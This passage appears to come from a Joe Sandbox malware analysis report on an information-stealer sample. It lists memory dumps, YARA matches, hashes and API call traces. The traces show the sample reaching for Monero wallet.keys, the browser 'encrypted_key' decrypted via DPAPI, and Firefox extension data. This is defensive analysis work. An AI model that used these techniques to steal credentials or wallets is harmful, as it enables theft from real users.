                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 35a3c239f71e7d8ab0547ac38e2e1a2e126a3fd91db10e18da5f4edadc900c2f
                                • Instruction ID: fe4913382369cb3ed62603f91c90cfa379f366ec181e61b24cb73df4e46e6daf
                                • Opcode Fuzzy Hash: 35a3c239f71e7d8ab0547ac38e2e1a2e126a3fd91db10e18da5f4edadc900c2f
                                • Instruction Fuzzy Hash: 362108B5A44208EBDB04DF98DD49FAEBBB8FB48701F104259F605E7790C779A9008BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B8951E,00000000), ref: 00B88D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88D62
                                • wsprintfW.USER32 ref: 00B88D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: c6ffe19638193ae432476b03f4ec5a2717dac469c4da5e4ad8fcd25ae696ba8d
                                • Instruction ID: d8820ff94c7ac2bb74fc454125d97be9909aeb5b78d39c7c3426855fcfb128a8
                                • Opcode Fuzzy Hash: c6ffe19638193ae432476b03f4ec5a2717dac469c4da5e4ad8fcd25ae696ba8d
                                • Instruction Fuzzy Hash: 54E046B4A40308FBCB00DB98DC0AA6977A8EB04702F000294F909C6780EA719A009BA2
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00B7A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00B7A6BC
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 27a89acac158722c53751f531dc5c662d8f885a882560a9230dc2fbfc3e00ba8
                                • Instruction ID: ef8459308cd9fab136665c5a9d52a7721d705fecf2f60d26fe123edb482e99e9
                                • Opcode Fuzzy Hash: 27a89acac158722c53751f531dc5c662d8f885a882560a9230dc2fbfc3e00ba8
                                • Instruction Fuzzy Hash: FCE1C6728101189BEB05FBA4DC91DEE737CAF54300F50859AF516B61B1EF346A49CB72
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7D481
                                • lstrlen.KERNEL32(00000000), ref: 00B7D698
                                • lstrlen.KERNEL32(00000000), ref: 00B7D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7D72B
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: f5f37bf8b1ab715b8e9968b615aee46ee691b7a2a0f2ee5edf29a7e79e7aae6a
                                • Instruction ID: aed76d29ca97bf8de5583442d5a84dc328661cf0521c930b4ab51396a377a5fe
                                • Opcode Fuzzy Hash: f5f37bf8b1ab715b8e9968b615aee46ee691b7a2a0f2ee5edf29a7e79e7aae6a
                                • Instruction Fuzzy Hash: FD91D4719101049BEB04FBA4DD96DEE73B8AF14300F5045AAF517B61B1EF386A09CB72
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7D801
                                • lstrlen.KERNEL32(00000000), ref: 00B7D99F
                                • lstrlen.KERNEL32(00000000), ref: 00B7D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7DA32
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 8dc9a0248460f140a3bbd6256ad8eafd531ef10bc44c9b3d9eb392f47d26d3a6
                                • Instruction ID: 7818204d0fda49726ac72d369a8dc37a7694415e596145baeaa9514e615060c6
                                • Opcode Fuzzy Hash: 8dc9a0248460f140a3bbd6256ad8eafd531ef10bc44c9b3d9eb392f47d26d3a6
                                • Instruction Fuzzy Hash: FA81E2729101149BEB04FBA4DC96DEE73B8AF54300F5045AAF517B61B1EF386A09CB72
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B91580,00B90D92), ref: 00B7F54C
                                • lstrlen.KERNEL32(00000000), ref: 00B7F56B
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 6ec58bf5c58720e8623d908cf223eea324bcfa9c206a5250398b175f0d863024
                                • Instruction ID: 202129dcc782fac1c67c75a0d4ca706117c2c30fdf670a34c6f8f16a670037be
                                • Opcode Fuzzy Hash: 6ec58bf5c58720e8623d908cf223eea324bcfa9c206a5250398b175f0d863024
                                • Instruction Fuzzy Hash: 97510575D101099BEB04FBB4DC96DED73B8AF54300F4085A9F816671A1EF386A09CBB2
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 2e3b8e23f779b4bd890fd0744fe2ba9a859700378e8f49be18b0f9ab2d40bbb8
                                • Instruction ID: 687550dcca487416acecabf3cb19c8c9fc079e27a61f082645ccd477834744fe
                                • Opcode Fuzzy Hash: 2e3b8e23f779b4bd890fd0744fe2ba9a859700378e8f49be18b0f9ab2d40bbb8
                                • Instruction Fuzzy Hash: 8F414F75D14109EFDF04FFA4D895AEEB7F4AF44B04F008059E41676260EB74AA05CFA2
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B79D39
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                  • Part of subcall function 00B79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                  • Part of subcall function 00B79AC0: LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                  • Part of subcall function 00B79B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B79B84
                                  • Part of subcall function 00B79B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00B79BA3
                                  • Part of subcall function 00B79B60: LocalFree.KERNEL32(?), ref: 00B79BD3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: a6bf8a703f9006f7c8d5913b5043d6a8f121c4dec776dbc80cbd77f5d175af91
                                • Instruction ID: 3003b12e9bbac1d94803305594205b70f95abead3d1490d52baef1f1f92abe34
                                • Opcode Fuzzy Hash: a6bf8a703f9006f7c8d5913b5043d6a8f121c4dec776dbc80cbd77f5d175af91
                                • Instruction Fuzzy Hash: B63110B5D10209ABDF14EBE4DC85AEE77F8EB48304F1485A9E915A7241FB349A04CBA1
                                APIs
                                • CreateFileA.KERNEL32(00B83AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B83AEE,?), ref: 00B892FC
                                • GetFileSizeEx.KERNEL32(000000FF,00B83AEE), ref: 00B89319
                                • CloseHandle.KERNEL32(000000FF), ref: 00B89327
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: cc45c03373a857e0d2d7bf6317802bfd79cc3f34a7363bc0e13e06ca3c8e4139
                                • Instruction ID: 9ad2784c6cae57559fbe66d1886603c0365f51ae19ba5f9c9131b516d291ba6e
                                • Opcode Fuzzy Hash: cc45c03373a857e0d2d7bf6317802bfd79cc3f34a7363bc0e13e06ca3c8e4139
                                • Instruction Fuzzy Hash: 05F01975E44308FBDF10EBA4DC49BAE77F9EB48710F108294B651A72D0DA709A018B94
                                APIs
                                • __getptd.LIBCMT ref: 00B8C74E
                                  • Part of subcall function 00B8BF9F: __amsg_exit.LIBCMT ref: 00B8BFAF
                                • __getptd.LIBCMT ref: 00B8C765
                                • __amsg_exit.LIBCMT ref: 00B8C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00B8C797
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 8ba8b50736adf178db86c1913768c1451760d0d1474c8bfaabb996fd2058a2e4
                                • Instruction ID: 2f1978f3bab64150a0b2c81182b1fdc54114a1428a60503e8e406955dd6c2016
                                • Opcode Fuzzy Hash: 8ba8b50736adf178db86c1913768c1451760d0d1474c8bfaabb996fd2058a2e4
                                • Instruction Fuzzy Hash: 92F06D769042109BD721BBB89806F4D3BE0AF00720F2441CAF504A71F2DF745D40DF6A
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84F7A
                                • lstrcat.KERNEL32(?,00B91070), ref: 00B84F97
                                • lstrcat.KERNEL32(?,00938A30), ref: 00B84FAB
                                • lstrcat.KERNEL32(?,00B91074), ref: 00B84FBD
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B8492C
                                  • Part of subcall function 00B84910: FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                  • Part of subcall function 00B84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                  • Part of subcall function 00B84910: FindClose.KERNEL32(000000FF), ref: 00B84B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 7fbcf892ddccc2f8abeb68e2792bd40af903779448d435b7779bf1679a51099a
                                • Instruction ID: 831a2e23dfab3ca5066a480e857b411f73fcb5dcdb8a62a601385d1b3fe984f4
                                • Opcode Fuzzy Hash: 7fbcf892ddccc2f8abeb68e2792bd40af903779448d435b7779bf1679a51099a
                                • Instruction Fuzzy Hash: E7218876900304EBCB54FB64DC46EED33BCA754700F4046D4B659925A1EE7597C8CBB2